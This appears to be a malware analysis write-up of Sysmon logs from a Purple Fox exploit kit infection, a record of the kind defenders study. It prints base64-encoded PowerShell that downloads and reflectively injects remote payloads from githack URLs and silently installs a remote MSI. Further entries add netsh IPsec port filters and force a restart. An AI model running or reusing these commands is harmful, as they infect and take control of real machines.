QQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwBJAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBBAHUAQQBIAGcAQQBlAFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA

[Sysmon Event type 1]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAbQBzAGkADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwBpAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKABzAHQAcgBpAG4AZwAgAHAAYQBjAGsAYQBnAGUAUABhAHQAaAAsACAAcwB0AHIAaQBuAGcAIABjAG8AbQBtAGEAbgBkAEwAaQBuAGUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKABpAG4AdAAgAGQAdwBVAEkATABlAHYAZQBsACwAIABJAG4AdABQAHQAcgAgAHAAaABXAG4AZAApADsADQAKAH0ADQAKACIAQAANAAoAJABwAGEAdABoACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAHgAeQB6AC8AMQBEAEgAUgBCAEYAUABMAFoAVABFAFEAUgBSAEIAVQBCAC4AagBwAGcAJwA7AA0ACgBbAG0AcwBpAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAHAAYQB0AGgAIgAsACIAIgApAA0ACgA=
CurrentDirectory C:\Users\Ricky\Desktop\
User NT AUTHORITY\SYSTEM
LogonGuid {4040f843-457e-5de9-0000-0020e7030000}
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEANQAwADUAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASQBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcAQQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwBJAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBBAHUAQQBIAGcAQQBlAFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA

[Sysmon Event type 1]
Image C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
FileVersion 8.0.50727.4927 (NetFXspW7.050727-4900)
Description Visual C# Command Line Compiler
Product Microsoft® Visual Studio® 2005
Company Microsoft Corporation
CommandLine “C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe” /noconfig /fullpaths @”C:\Users\Ricky\AppData\Local\Temp\4ohqsi5j.cmdline”
CurrentDirectory C:\Users\Ricky\Desktop\
User NT AUTHORITY\SYSTEM
Hashes MD5=E2107F227E1C174C20BEB7A51404BBAC
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAbQBzAGkADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwBpAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKABzAHQAcgBpAG4AZwAgAHAAYQBjAGsAYQBnAGUAUABhAHQAaAAsACAAcwB0AHIAaQBuAGcAIABjAG8AbQBtAGEAbgBkAEwAaQBuAGUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKABpAG4AdAAgAGQAdwBVAEkATABlAHYAZQBsACwAIABJAG4AdABQAHQAcgAgAHAAaABXAG4AZAApADsADQAKAH0ADQAKACIAQAANAAoAJABwAGEAdABoACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAHgAeQB6AC8AMQBEAEgAUgBCAEYAUABMAFoAVABFAFEAUgBSAEIAVQBCAC4AagBwAGcAJwA7AA0ACgBbAG0AcwBpAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAHAAYQB0AGgAIgAsACIAIgApAA0ACgA=

[Sysmon Event type 1]
Image C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
FileVersion 8.00.50727.4940 (Win7SP1.050727-5400)
Description Microsoft® Resource File To COFF Object Conversion Utility
Product Microsoft® Visual Studio® 2005
Company Microsoft Corporation
CommandLine C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Users\Ricky\AppData\Local\Temp\RES59A5.tmp” “c:\Users\Ricky\AppData\Local\Temp\CSC59A4.tmp”
CurrentDirectory C:\Users\Ricky\Desktop\
User NT AUTHORITY\SYSTEM
Hashes MD5=449F7C92A14B7F50B898FC67202A326C
ParentImage C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
ParentCommandLine “C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe” /noconfig /fullpaths @”C:\Users\Ricky\AppData\Local\Temp\4ohqsi5j.cmdline”

[Sysmon Event type 1]
Image C:\Windows\Installer\MSI764E.tmp
FileVersion 16.3.0.0
Description File that launches another file
Product Advanced Installer
Company Caphyon LTD
CommandLine “C:\Windows\Installer\MSI764E.tmp” /DontWait /HideWindow “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Start-Sleep -Seconds 900; Restart-Computer -Force
CurrentDirectory C:\Windows\system32\
User NT AUTHORITY\SYSTEM
Hashes MD5=17D89C53FECC7342DCADAB11A266E969
ParentImage C:\Windows\System32\msiexec.exe
ParentCommandLine C:\Windows\system32\msiexec.exe /V

[Sysmon Event type 1]
Image C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Start-Sleep -Seconds 900; Restart-Computer -Force
CurrentDirectory C:\Windows\System32\WindowsPowerShell\v1.0\
User NT AUTHORITY\SYSTEM
Hashes MD5=92F44E405DB16AC55D97E3BFE3B132FA
ParentImage C:\Windows\Installer\MSI764E.tmp
ParentCommandLine “C:\Windows\Installer\MSI764E.tmp” /DontWait /HideWindow “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Start-Sleep -Seconds 900; Restart-Computer -Force

[Sysmon Event type 1]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\SysWOW64\netsh.exe” interface ipv6 install
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

[Sysmon Event type 1]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\SysWOW64\netsh.exe” ipsec static add policy name=qianye
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

[Sysmon Event type 1]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\SysWOW64\netsh.exe” ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

[Sysmon Event type 1]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\SysWOW64\netsh.exe” ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

[Sysmon Event type 1]
Image C:\Windows\SysWOW64\netsh.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Network Command Shell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\SysWOW64\netsh.exe” ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
CurrentDirectory C:\Windows\SysWOW64\
User NT AUTHORITY\SYSTEM
Hashes MD5=784A50A6A09C25F011C3143DDD68E729
ParentImage C:\Windows\SysWOW64\msiexec.exe
ParentCommandLine C:\Windows\syswow64\MsiExec.exe -Embedding 3800D9B153AF719127A19E5E4E71F5D9 M Global\MSI0000

IMAGES AND DETAILS:


Shown above: Network traffic associated with the Purple Fox EK infection


Shown above: DNS traffic associated with the Purple Fox EK and post infection